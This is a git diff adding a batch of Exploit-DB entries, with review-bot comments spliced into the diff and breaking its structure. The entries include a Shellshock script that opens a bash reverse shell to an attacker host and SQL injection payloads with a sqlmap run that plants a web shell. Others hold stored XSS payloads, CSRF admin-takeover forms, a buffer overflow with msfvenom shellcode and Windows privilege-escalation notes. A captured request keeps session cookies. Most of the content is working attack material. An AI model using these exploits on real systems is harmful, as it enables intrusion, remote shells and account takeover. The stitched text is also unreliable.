diff --git a/exploits/hardware/webapps/48077.txt b/exploits/hardware/webapps/48077.txt
new file mode 100644
index 000000000..25f0a8a09
--- /dev/null
+++ b/exploits/hardware/webapps/48077.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
+# Exploit Author: Sarang Tumne a.k.a SarT
+# Date: 2020-02-14
+# Confirmed on release 5.2
+# Vendor: https://www.avaya.com/en/
+# Avaya's advisory:
+# https://downloads.avaya.com/css/P8/documents/100183151
+# Exploit generates a reverse shell to a nc listener (Shellshock Exploit)
+
+###############################################
+
+#!/usr/bin/python
+
+import sys
+import requests
+
+if len(sys.argv) < 4:
+ print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
+ print "[*] Usage: "
+ print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
+ print "[*] Netcat Listener: nc -lvvnp "
+ print "\n"
+ sys.exit()
+
+#Disables request warning for cert validation ignore.
+requests.packages.urllib3.disable_warnings()
+CM = sys.argv[1]
+url = "https://" + CM + "/mt/mt.cgi"
+attacker_ip = sys.argv[2]
+rev_port = sys.argv[3]
+
+http_headers = {
+
+ "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
+
+ }
+
+def main():
+ if len(sys.argv) == 4:
+
+ print "[+] Success, spawning a shell on your custom port :)..."
+ requests.get(url, headers=http_headers, verify=False, timeout=5)
+
+ else:
+ print "[-] Something went wrong, quitting..."
+
+ sys.exit()
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/java/webapps/48090.py b/exploits/java/webapps/48090.py
new file mode 100755
index 000000000..33263780b
--- /dev/null
+++ b/exploits/java/webapps/48090.py
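Review bot: The header block carries no `# CVE :` line, unlike 48076 and 48090 in this commit, although the linked Avaya advisory is where the underlying bash bug is identified; add `# CVE : <id from the vendor advisory>` so the index entry can be cross-referenced. The `#!/usr/bin/python` line sits after the comment header and the `###` separator, so it is an ordinary comment rather than an interpreter line; if the file is meant to run directly it belongs on line 1, and a `# Tested with: Python 2` header line would explain the print-statement syntax. The `[*] Usage:` and `nc -lvvnp` lines print with no argument placeholders on this page, which looks like angle-bracket placeholders lost in rendering rather than a defect in the commit — worth confirming against the raw file.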
@@ -0,0 +1,70 @@ +# Exploit Title: LabVantage 8.3 - Information Disclosure +# Google Dork: N/A +# Date: 2020-02-16 +# Exploit Author: Joel Aviad Ossi +# Vendor Homepage: labvantage.com +# Software Link: N/A +# Version: LabVantage 8.3 +# Tested on: * +# CVE : N/A + + +import requests +import operator + + +def exploit(target): + print("[+] Fetching LabVantage Database Name..") + start = "name=\"database\" id=\"database\" value=\"" + end = "\" >" + vstart = "= 5.0 boolean-based blind - ORDER BY, GROUP BY clause +Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END)) + +Type: time-based blind +Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) +Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1) +--- + + +Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes. \ No newline at end of file diff --git a/exploits/php/webapps/48076.txt b/exploits/php/webapps/48076.txt new file mode 100644 index 000000000..cb8272a90 --- /dev/null +++ b/exploits/php/webapps/48076.txt 
@@ -0,0 +1,43 @@ +# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting +# Date: 2020-01-23 +# Vendor Homepage: https://strongtestimonials.com +# Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt +# Exploit Author: Jinson Varghese Behanan +# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/ +# Author Homepage: https://www.jinsonvarghese.com +# Version: 2.40.0 and below +# CVE : CVE-2020-8549 + +# 1. Description +# Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with +# over 90,000 active installations. In the client details section which is seen when adding +# or editing a testimonial, the custom[client_name] and custom[company_name] parameters +# were found to be vulnerable to stored cross-site scripting. All WordPress websites +# using Strong Testimonials version 2.40.0 and below are affected. + +2. Proof of Concept + +When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed. + +The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page. 
+ +POST /wp-admin/post.php HTTP/1.1 +Host: testing.com +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit +Content-Type: application/x-www-form-urlencoded +Content-Length: 1402 +Origin: http://testing.com +Connection: close +Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg +Upgrade-Insecure-Requests: 1 + 
+_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator + +3. Timeline + +Vulnerability reported to the Strong Testimonials team – January 23, 2020 +Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020 \ No newline at end of file diff --git a/exploits/php/webapps/48082.txt b/exploits/php/webapps/48082.txt new file mode 100644 index 000000000..7d3a6be57 --- /dev/null +++ b/exploits/php/webapps/48082.txt 
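Review bot: The captured request on the preceding lines reproduces the author's live WordPress session cookies (`wordpress_logged_in_…`, `PHPSESSID`) and the `_wpnonce`/`meta-box-order-nonce` values from the test instance verbatim; these are instance-specific secrets that belong in a PoC only as placeholders, e.g. `Cookie: <authenticated wp-admin session>` and `_wpnonce=<nonce>`, which also makes explicit that the stored XSS appears to need an authenticated session able to edit testimonials. Once those values are replaced the `Content-Length: 1402` header no longer matches the body, so drop it or mark it `<recomputed>`. The Timeline section is good; a one-line remediation statement (output escaping of `custom[client_name]`/`custom[company_name]` in the fixed 2.40.1 release, if that is what the changelog says) would complete the entry.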
@@ -0,0 +1,40 @@ +# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User) +# Date: 2020-02-14 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://icehrm.com/ +# Software Link: https://sourceforge.net/projects/icehrm/#Version 26.2.0 +# Tested on Windows 10/Kali Rolling + +# The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change: + +# POC for user creation: + + + + +
+ + + + + + +
+ + + +# POC for Password Change: + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48083.txt b/exploits/php/webapps/48083.txt new file mode 100644 index 000000000..52bcd402c --- /dev/null +++ b/exploits/php/webapps/48083.txt @@ -0,0 +1,25 @@ +# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting +# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply" +# Date: 2020-02-14 +# Category : Webapps +# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip +# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful +# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari) +# Team Members: Behzad Khalifeh , Milad Ranjbar +# Version: 3.8 +# Tested on: Windows/Linux +# CVE: N/A + +.:: Theme Description ::. +Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design. + +.:: Proof Of Concept (PoC) ::. +Step 1 - Find Your Target With above Dork. +Step 2 - Inject Your Java Script Codes to Name & Email Fields +Step 3 - Click Post Comment + +.:: Tested Payload ::. +'>"> + +.:: Post Request ::. +comment=XSS :)&author='>">&email='>">&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145 \ No newline at end of file diff --git a/exploits/php/webapps/48086.txt b/exploits/php/webapps/48086.txt new file mode 100644 index 000000000..5f4a6cd67 --- /dev/null +++ b/exploits/php/webapps/48086.txt 
@@ -0,0 +1,69 @@ +# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User) +# Date: 2020-02-14 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://www.soplanning.org/en/ +# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ +# Version 1.45 +# Tested on Windows 10/Kali Rolling + +# The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary +# user creation and for changing passwords (Specifically the admin password) + +# POC For aribtrary user creation: +# CSRF POC: + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + +
+ + + +# POC for admin password change: + +# CSRF POC: + + + + +
+ + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48089.txt b/exploits/php/webapps/48089.txt new file mode 100644 index 000000000..7dcfdb2a8 --- /dev/null +++ b/exploits/php/webapps/48089.txt 
@@ -0,0 +1,67 @@ +# Exploit Title: SOPlanning 1.45 - 'users' SQL Injection +# Date: 2020-02-14 +# Exploit Author: J3rryBl4nks, Homebrewer +# Vendor Homepage: https://www.soplanning.org/en/ +# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ +# Version 1.45 +# Tested on Windows 10/Kali Rolling + +The SOPlanning application is vulnerable to SQL Injection that leads to Remote Code Execution. + +Exploit POC: + +Once you have extracted the admin hash, you can now use that to get command execution on the machine through another SQL Injection. + +Save the admin hash and insert it into SQLMap as such: + +sqlmap -u 'http://HOSTHERE/soplanning/www/export_ical.php?login=admin&hash=HASHHERE&nocache&users=ADM&age=3' -p users --risk=3 --level=5 --threads=10 --dbms=mysql --keep-alive --os-shell\ + + +Now you have a web shell uploaded to the server: + +11:52:31] [INFO] GET parameter 'users' is 'MySQL UNION query (NULL) - 41 to 60 columns' injectable +GET parameter 'users' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] N +sqlmap identified the following injection point(s) with a total of 2122 HTTP(s) requests: +--- +Parameter: users (GET) +Type: time-based blind +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') AND (SELECT 6911 FROM (SELECT(SLEEP(5)))GfEH) AND ('gglk'='gglk&age=3 + +Type: UNION query +Title: MySQL UNION query (NULL) - 42 columns +Payload: login=admin&hash=0eb87cdffc77dce2baabfd6c4dddc264&nocache&users=ADM') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x4e6564784469636f6a4f5867627a44744f517452677545755a455a694c4d676f436a776f66645547,0x716a707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&age=3 +--- +[11:53:02] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.41, PHP 7.2.26 +back-end DBMS: MySQL >= 5.0.12 +[11:53:02] [INFO] going to use a web backdoor for command prompt +[11:53:02] [INFO] fingerprinting the back-end DBMS operating system +[11:53:02] [INFO] the back-end DBMS operating system is Windows +which web application language does the web server support? +[1] ASP +[2] ASPX +[3] JSP +[4] PHP (default) +> 4 +do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n +[11:53:07] [WARNING] unable to automatically retrieve the web server document root +what do you want to use for writable directory? 
+[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default) +[2] custom location(s) +[3] custom directory list file +[4] brute force search +> 2 +please provide a comma separate list of absolute directory paths: C:\xampp\htdocs\soplanning\www +[11:53:23] [WARNING] unable to automatically parse any web server path +[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via LIMIT 'LINES TERMINATED BY' method +[11:53:23] [WARNING] unable to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' +[11:53:23] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/soplanning/www/' via UNION method +[11:53:23] [WARNING] expect junk characters inside the file as a leftover from UNION query +[11:53:23] [INFO] the remote file 'C:/xampp/htdocs/soplanning/www/tmpubhkt.php' is larger (768 B) than the local file '/tmp/sqlmapi5F_1P150931/tmpEOtI5R' (727B) +[11:53:23] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/soplanning/www/' - http://HOST/soplanning/www/tmpubhkt.php + + +Using that webshell you can upload your reverse shell. + +Mad props to : https://twitter.com/HackingHomebre1 for the POC creation and assist. \ No newline at end of file diff --git a/exploits/windows/local/48075.txt b/exploits/windows/local/48075.txt new file mode 100644 index 000000000..6e1aeef57 --- /dev/null +++ b/exploits/windows/local/48075.txt 
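Review bot: The sqlmap transcript on the preceding lines embeds the lab instance's real admin hash `0eb87cdffc77dce2baabfd6c4dddc264` and the uploaded stager path, while the command line above it uses the `HOSTHERE`/`HASHHERE` placeholders; keep the transcript consistent with the command and substitute `HASHHERE` so readers do not mistake a lab artifact for a default credential. The step `Once you have extracted the admin hash` never says where the hash comes from; a one-line cross-reference to the companion `'by'` parameter entry indexed in this same commit (48074) would close that gap. From the remediation side the write-up does not name the fix — the `users` argument of `export_ical.php` needs a parameterised query or strict allow-listing — which a vendor-facing advisory should state alongside the `hash=` authentication requirement it already implies.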
@@ -0,0 +1,35 @@ +# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path +# Discovery by: Roberto Piña +# Discovery Date: 2020-02-14 +# Vendor Homepage:https://www8.hp.com/mx/es/home.html +# Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe +# HP Development Company, L.P. +# Tested Version: 1.2.9.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Home x64 en + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """ +HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto + +C:\>sc qc HPWMISVC +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: HPWMISVC + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : HPWMISVC + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\> +# Exploit: +# A successful attempt would require the local user to be able to insert their code in the system +# root path undetected by the OS or other security applications where it could potentially be +# executed during application startup or reboot. If successful, the local user's code would +# execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/48078.txt b/exploits/windows/local/48078.txt new file mode 100644 index 000000000..7d0804ed4 --- /dev/null +++ b/exploits/windows/local/48078.txt 
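Review bot: The `# Exploit:` paragraph states the precondition only loosely (`insert their code in the system root path`); an unquoted service path is exploitable only if a standard user can create a file in one of the intermediate directories (`C:\Program Files (x86)\` or `C:\Program Files (x86)\Hewlett-Packard\` here), which the default ACLs on Program Files deny, so the `wmic`/`sc qc` output on its own does not establish privilege escalation. The entry should record whether such a directory was found writable on the tested system, or carry a line such as `# Requires: write access to an intermediate directory of the service path (not verified)`. The same gap applies to 48078.txt, 48080.txt and 48085.txt in this commit, which carry no exploitability statement at all. A remediation line would also help: the fix is quoting `BINARY_PATH_NAME` in the service configuration, e.g. `sc config HPWMISVC binPath= "\"C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe\""`.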
@@ -0,0 +1,27 @@ +# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path +# Exploit Author: boku +# Date: 2020-02-10 +# Vendor Homepage: https://www.weird-solutions.com +# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe +# Version: 2.0.1214 +# Tested On: Windows 10 (32-bit) + +C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """ +BOOTP Turbo C:\Program Files\BOOTP Turbo\bootpt.exe Auto + +C:\Users\user>sc qc "BOOTP Turbo" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: BOOTP Turbo + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\BOOTP Turbo\bootpt.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : BOOTP Turbo + DEPENDENCIES : Nsi + : Afd + : NetBT + : Tcpip + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/48079.txt b/exploits/windows/local/48079.txt new file mode 100644 index 000000000..60cf85d58 --- /dev/null +++ b/exploits/windows/local/48079.txt 
@@ -0,0 +1,104 @@ +# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation +# Author: nu11secur1ty +# Date: 2020-02-14 +# Vendor: Microsoft +# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty +# CVE: CVE-2020-0683 + + +[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) +[+] Website: https://www.nu11secur1ty.com/ +[+] Source: readme from GitHUB +[+] twitter.com/nu11secur1ty + + +[Exploit Program] +Link: +https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty + + +[Vendor] +Microsoft + + +[Vulnerability Type] +Windows Installer Elevation of Privilege Vulnerability + +[CVE Reference] + +An elevation of privilege vulnerability exists in the Windows Installer +when MSI packages process symbolic links. An attacker who successfully +exploited this vulnerability could bypass access restrictions to add or +remove files. + +To exploit this vulnerability, an attacker would first have to log on to +the system. An attacker could then run a specially crafted application that +could exploit the vulnerability and add or remove files. + +The security update addresses the vulnerability by modifying how to reparse +points are handled by the Windows Installer. + + +[Security Issue] +Elevation of Privilege from user to C:\Windows\administartion execution +files + + +[References] + +# CVE-2020-0683 +Original Poc sent to MSRC. +Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege +https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683 + +Source code for Visual Studio C++ 2019 + +Inside "nu11secur1ty" you'll find the exploit (exe) to execute. 
+ +# Note: + +This test is using `system.ini` in c:\Windows\system.ini +When you exploit this file you should replace with the original file +`system.ini` after this test, which you will find in CVE-2020-0683 +directory :) + +-------------------------------------------------------------------------- + +- - How to run the exploit + +Go into "nu11secur1ty" directory and from a cmd console launch: + +- for the test + +MsiExploit.exe c:\Windows\system.ini" + +Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory. + +- Disclaimer: + + The entry creation date may reflect when the CVE ID was allocated or +reserved, and does not necessarily indicate when this vulnerability +was discovered, shared with the affected vendor, publicly disclosed, +or updated in CVE. + + +- @nu11secur1ty + + +[Network Access] +Local + + +[Disclosure Timeline] +02/11/2020 + +[Disclaimer] + + The entry creation date may reflect when the CVE ID was allocated or +reserved, and does not necessarily indicate when this vulnerability +was discovered, shared with the affected vendor, publicly disclosed, +or updated in CVE. + + +nu11secur1ty +-- \ No newline at end of file diff --git a/exploits/windows/local/48080.txt b/exploits/windows/local/48080.txt new file mode 100644 index 000000000..0a1a8c538 --- /dev/null +++ b/exploits/windows/local/48080.txt 
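Review bot: The entry distributes the PoC only as a compiled `MsiExploit.exe` plus `foo.msi` from an external repository; `Source code for Visual Studio C++ 2019` is claimed but no source is in the entry, so what the binary does beyond the `system.ini` replacement the note warns about cannot be reviewed — include or link the source and record a hash of both files. The test command `MsiExploit.exe c:\Windows\system.ini"` has an unmatched closing quote, the `[Security Issue]` line's `C:\Windows\administartion execution files` is not a real path, and the `Disclaimer` paragraph appears twice; these read as paste errors and should be cleaned up. The `[Disclosure Timeline]` gives only `02/11/2020` without saying whether that is the report date, the fix date or the publication date.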
@@ -0,0 +1,26 @@ +Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path +Exploit Author: boku +Date: 2020-02-10 +Vendor Homepage: https://www.weird-solutions.com +Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe +Version: 4.6.1298 +Tested On: Windows 10 (32-bit) + +C:\Users\user>sc qc "DHCP Turbo 4" +SERVICE_NAME: DHCP Turbo 4 + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\DHCP Turbo 4\dhcpt.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : DHCP Turbo 4 + DEPENDENCIES : Nsi + : Afd + : NetBT + : Tcpip + SERVICE_START_NAME : LocalSystem + +C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo" +DisplayName PathName StartMode +DHCP Turbo 4 C:\Program Files\DHCP Turbo 4\dhcpt.exe Auto \ No newline at end of file diff --git a/exploits/windows/local/48085.txt b/exploits/windows/local/48085.txt new file mode 100644 index 000000000..bce39a7ab --- /dev/null +++ b/exploits/windows/local/48085.txt @@ -0,0 +1,27 @@ +# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path +# Exploit Author: boku +# Date: 2020-02-10 +# Vendor Homepage: https://www.weird-solutions.com +# Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe +# Version: 4.6.1273 +# Tested On: Windows 10 (32-bit) + +C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """ +TFTP Turbo 4 C:\Program Files\TFTP Turbo 4\tftpt.exe Auto + +C:\Users\nightelf>sc qc "TFTP Turbo 4" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: TFTP Turbo 4 + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\TFTP Turbo 4\tftpt.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : TFTP Turbo 4 + DEPENDENCIES : Nsi + : Afd + : NetBT + : Tcpip + SERVICE_START_NAME : LocalSystem \ No newline at end of file 
diff --git a/exploits/windows/local/48087.py b/exploits/windows/local/48087.py
new file mode 100755
index 000000000..883167066
--- /dev/null
+++ b/exploits/windows/local/48087.py
@@ -0,0 +1,65 @@ +# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow +# Exploit Author: boku +# Date: 2020-02-14 +# Vendor Homepage: https://en.softonic.com/author/pxcompany +# Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download +# Version: 5.0 +# Tested On: Windows 10 (32-bit) +# +# Recreate: +# 1) Install & Open Cuckoo Clock v5.0 +# 2) Right Click app icon (bottom right), click Alarms +# 3) Click the Add Button +# 4) Run Python script +# 5) Open generated poc.txt, then select-all & copy-all +# 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer +# 7) Press Back Button and shellcode will execute + +# EIP Overwrite at 260 Bytes +# Max Buffer space is 1287 bytes +# ESP points to payload at offset 264 bytes +# EBP overwrite at 256 bytes + +# badChars = '\x00\x0d' + +try: + ebpOffset = '\x41'*256 + ebp = '\x42\x42\x42\x42' + eip = '\x16\x05\x03\x10' # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll] + # ASLR: False, Rebase: False, SafeSEH: False (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll) + # ESP points to payload at offset 264 bytes + # 1019 bytes = Remaining Buffer Length + fixStack = '\x89\xE5' # mov ebp,esp + fixStack += '\x83\xEC\x30' # sub esp,byte +0x30 + # root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode + # x86/shikata_ga_nai chosen with final size 216 + shellcode = b"" + shellcode += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4" + shellcode += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14" + shellcode += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96" + shellcode += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a" + shellcode += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64" + shellcode += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35" + shellcode += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34" + shellcode += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32" + shellcode += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a" + 
shellcode += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d" + shellcode += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3" + shellcode += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f" + shellcode += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c" + shellcode += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4" + shellcode += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55" + shellcode += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a" + shellcode += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56" + shellcode += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb" + shellcode += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48" + shellcode += b"\xa9\x70\x67\x0f\x39\x18\x68" + Remainder = '\x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode)) + payload = ebpOffset+ebp+eip+fixStack+shellcode+Remainder + File = 'poc.txt' + f = open(File, 'w') + f.write(payload) + f.close() + print File + " created successfully" +except: + print File + ' failed to create' \ No newline at end of file diff --git a/exploits/windows/remote/48092.rb b/exploits/windows/remote/48092.rb new file mode 100755 index 000000000..e661fb7ff --- /dev/null +++ b/exploits/windows/remote/48092.rb 
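Review bot: The `except:` closing the `try` block is bare, and its handler `print File + ' failed to create'` reads `File`, which is only bound inside the `try`; if anything before `File = 'poc.txt'` raises, the handler itself fails with `NameError` and the original error is lost. Bind the name before the block and narrow the clause: move `File = 'poc.txt'` above `try:` and use `except IOError as e:` with `e` included in the message; `with open(File, 'w') as f:` would also replace the explicit `f.close()`. The recreate steps and the `# badChars` note are useful documentation; a `# Python 2` header line would explain the print-statement syntax to readers on a current interpreter.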
